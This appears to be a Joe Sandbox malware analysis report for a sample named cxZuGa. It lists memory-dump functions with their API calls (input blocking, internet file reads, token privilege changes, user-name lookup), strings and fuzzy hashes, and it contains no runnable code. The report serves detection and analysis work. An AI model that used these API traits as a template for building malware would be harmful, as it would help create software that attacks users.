                                                            • Opcode ID: 0a1c5bb443c020c262df8418af2e2bd068d9f57d67344cb8eb19a51fac8e6ff3
                                                            • Instruction ID: fba8839f98294cc5bcb9c3244b95f3926d7e47cc6a0d5bde4d779f2b4e2afd9d
                                                            • Opcode Fuzzy Hash: 0a1c5bb443c020c262df8418af2e2bd068d9f57d67344cb8eb19a51fac8e6ff3
                                                            • Instruction Fuzzy Hash: D7D0E2AAA1D563D1EA50EF94F8412BDE332BF40B15BC00033E50E4A4D8AF79E504E723
                                                            Function 00007FF7EC1667F0 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise_clrfp
                                                            • String ID:
                                                            • API String ID: 15204871-0
                                                            • Opcode ID: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                            • Instruction ID: 5cef6726d6addb7ab9a6fac453aceeeaac76e27685d2f013bc46c4eadbcd9cc8
                                                            • Opcode Fuzzy Hash: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                            • Instruction Fuzzy Hash: 1EB19DB7600B848BEB15CF29D84536CBBA0F784B88F58C926DB9D837A4CB39D451C711
                                                            Function 00007FF7EC1AE968 Relevance: 3.1, APIs: 2, Instructions: 97networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            • Opcode ID: a54c6d4a74e6411871131af3bdbcf589181ad988d0891215d2ce77e29c03cb3f
                                                            • Instruction ID: 92919b83ff94e8d83280cd973df79e5ec9bec5b691a8b8eedc480be43802bd4b
                                                            • Opcode Fuzzy Hash: a54c6d4a74e6411871131af3bdbcf589181ad988d0891215d2ce77e29c03cb3f
                                                            • Instruction Fuzzy Hash: 6F31D07AB08A0186FB18EF26E4507B8A7A1FF85B88F984436DE0D47B98DF38D451C311
                                                            Function 00007FF7EC18CCE0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            • Opcode ID: 2696843c0c1c48d019296e0beaf727179f08331fefa667d0a626b5bdda81ebd6
                                                            • Instruction ID: 63398d3a5509748bcf63695da06353c89088011e3a991527a867461c559f8871
                                                            • Opcode Fuzzy Hash: 2696843c0c1c48d019296e0beaf727179f08331fefa667d0a626b5bdda81ebd6
                                                            • Instruction Fuzzy Hash: A7F065FAA18A4582EB54EB61E4153B99760FBD8F99FA40533CE0D0B658CF3CD086C261
                                                            Function 00007FF7EC1595B0 Relevance: 2.9, Strings: 2, Instructions: 378COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: a/p$am/pm
                                                            • API String ID: 0-3206640213
                                                            • Opcode ID: 7b3f4c1adbce48e9712f7f101c5ec161db5e41a840f2bf09c06579e081aceba8
                                                            • Instruction ID: bb755dfeae156fa7eea9f722bce78d07c705e2ba7426fa2b8d59391466352729
                                                            • Opcode Fuzzy Hash: 7b3f4c1adbce48e9712f7f101c5ec161db5e41a840f2bf09c06579e081aceba8
                                                            • Instruction Fuzzy Hash: CCE1A2AAA0865285E764AF2CA1447BDA3A5FF41780FD44133EB1E46784DF3DE952C323
                                                            Function 00007FF7EC14C3FC Relevance: 2.7, Strings: 2, Instructions: 219COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: 0$0x%p
                                                            • API String ID: 3215553584-2479247192
                                                            • Opcode ID: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
                                                            • Instruction ID: 100a89784b52a51d939d14d9c4a5bd0ba50741ac8e456b69fa7d58b034a16909
                                                            • Opcode Fuzzy Hash: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
                                                            • Instruction Fuzzy Hash: B481F5EAB1820286EA64AB25A16077DA790FF40744FD41533ED0D8F695EF3DE842D722
                                                            Function 00007FF7EC130E70 Relevance: 1.9, Strings: 1, Instructions: 680COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Variable is not of type 'Object'.
                                                            • API String ID: 0-1840281001
                                                            • Opcode ID: 0846f4224996d3c000beb684e8f92ad8a272e358ff67d15cb6cee7ad666ce03d
                                                            • Instruction ID: 0220f048619eac99638f6cdd6c8db8d8281a346c8b3d542064830666a95fb3fc
                                                            • Opcode Fuzzy Hash: 0846f4224996d3c000beb684e8f92ad8a272e358ff67d15cb6cee7ad666ce03d
                                                            • Instruction Fuzzy Hash: D05250BAA08642CAFB10EF64E0413FCA3A1AB4578CF914137EE0D57685DF38E945D362
                                                            Function 00007FF7EC13FA4F Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: no error
                                                            • API String ID: 0-1106124726
                                                            • Opcode ID: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                            • Instruction ID: 3a82cdd44a9d6b6943d7b936ceddf17902fa448a1419ffbe15981b38c2eff643
                                                            • Opcode Fuzzy Hash: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                            • Instruction Fuzzy Hash: 8F12BDBBA087918AE724EF25E4402ADB7B0FB04748F914136EE4E57B94DF38E940C712
                                                            Function 00007FF7EC1B0A00 Relevance: 1.5, APIs: 1, Instructions: 23keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: BlockInput
                                                            • String ID:
                                                            • API String ID: 3456056419-0
                                                            • Opcode ID: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                            • Instruction ID: fbdafb3b4f5167a93331271b4aa64ac75b6b694e595bb55a3ce9abe02da82898
                                                            • Opcode Fuzzy Hash: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                            • Instruction Fuzzy Hash: 15E065B6714242C6EB54AB75F040379A290AB88B84F545436DA1D87395DE7CD490C711
                                                            Function 00007FF7EC182BCF Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID:
                                                            • API String ID: 2645101109-0
                                                            • Opcode ID: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                            • Instruction ID: fc8e823b5cf5de317e5280de6f3f0d77d8802ccd523760da3a2b36f6843567b5
                                                            • Opcode Fuzzy Hash: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                            • Instruction Fuzzy Hash: 19C012F56146A2D9E760EF24E8842DC3330F70031DFC00022E60A0E4AC9F788248C300
                                                            Function 00007FF7EC14C130 Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: 0
                                                            • API String ID: 3215553584-4108050209
                                                            • Opcode ID: e36cd3313365073150127e4babc7a8598c5f16c08797db25288978382bee99ce
                                                            • Instruction ID: 9aa8efff1cbc78b121321e9c81680c9b4ce9bfef02c99e864d857c13f1e882f7
                                                            • Opcode Fuzzy Hash: e36cd3313365073150127e4babc7a8598c5f16c08797db25288978382bee99ce
                                                            • Instruction Fuzzy Hash: E5816EA9A1810286EA64BA55B060B7EE391FF41B44FD41533DD0E8F685EF3DE805C763
                                                            Function 00007FF7EC14BEB4 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: 0
                                                            • API String ID: 3215553584-4108050209
                                                            • Opcode ID: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                            • Instruction ID: 7d7ae44a811e7060c064029beeecd8384da98243f1b9c346e9495ee03c353285
                                                            • Opcode Fuzzy Hash: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                            • Instruction Fuzzy Hash: 1B71A5ADA0C64246EA68AA29705037DE790BF41B44F940577DD0CCF6D5EE3DE845CB23
                                                            Function 00007FF7EC15A8A0 Relevance: 1.4, Strings: 1, Instructions: 139COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
                                                            • Instruction ID: dd8c7fb750a28faaa76738bd44f58dbe0ad2de917dd4e3d7a736f422eb50e107
                                                            • Opcode Fuzzy Hash: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
                                                            • Instruction Fuzzy Hash: 1741C1A6714B5886EA44DF2AE4153A9A3A1BB4CFC4B89A033DF0D87754EE3CD456C340
                                                            Function 00007FF7EC12B9F0 Relevance: .6, Instructions: 577COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a2428b1a41b9dab0837923aee02f6dd20d06634fc1108aa9b555873352bd9b52
                                                            • Instruction ID: 247a02c24ffb6f4916b110b7a0d485fc92f83e21d4c579ecc7546f82c58b4325
                                                            • Opcode Fuzzy Hash: a2428b1a41b9dab0837923aee02f6dd20d06634fc1108aa9b555873352bd9b52
                                                            • Instruction Fuzzy Hash: 5742D1BAB08782C6EB14EB25E4803ADB7A5FB84798FA04136DE5D47B95DF38E401C711
                                                            Function 00007FF7EC1530DC Relevance: .5, Instructions: 535COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                            • Instruction ID: 165e42dd2dde76fdfe0ccfb27bb0136f1dfd269520c69bba8ecfbc16b188e39a
                                                            • Opcode Fuzzy Hash: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                            • Instruction Fuzzy Hash: E84241A9D29E4AC5E253AB39B451735AB24BF523C2FC18337E90F67654DF3CA442C221
                                                            Function 00007FF7EC166DE4 Relevance: .2, Instructions: 194COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                            • Instruction ID: 7e3bef8c7bfa490cb912064a9762595a05debd6103b1cb324976be8a4792d3cf
                                                            • Opcode Fuzzy Hash: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                            • Instruction Fuzzy Hash: 3C712CEAA1C25286F724AA29B45073CF281AF413B0F944677D65E876C5EE7DE840C732
                                                            Function 00007FF7EC1A1A18 Relevance: .1, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                            • Instruction ID: 1a1ca3e7ecec85d0f01896f05c1e968554b2322c60bae8dafe422ee430925d62
                                                            • Opcode Fuzzy Hash: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                            • Instruction Fuzzy Hash: 5621D177B244418AE708CF75E8527A973E9A360708F48C13AD62B83384CE3CE904C791
                                                            Function 00007FF7EC15FD20 Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                            • Instruction ID: a4c052af7f5203c03b99983c248ba7a3a953c19ad85ff0e05250725c2b3d7aed
                                                            • Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                            • Instruction Fuzzy Hash: A6F04475B182958AEB94DF2CA44362A7794E7083C4FD0803AD68D83F44DA3C9051DF15
                                                            Function 00007FF7EC1459C8 Relevance: .0, Instructions: 2COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                            • Instruction ID: 4b9dfd33746b85f79107ecb6388ac07dcb74037d87368e02ec4cf080bd3165fa
                                                            • Opcode Fuzzy Hash: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                            • Instruction Fuzzy Hash: D5A002FD90EC02D4E604AB00F850330AB30FB50311BD10433E00D454A5AF3CA486C322
                                                            Function 00007FF7EC1CE95C Relevance: 49.7, APIs: 33, Instructions: 231windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
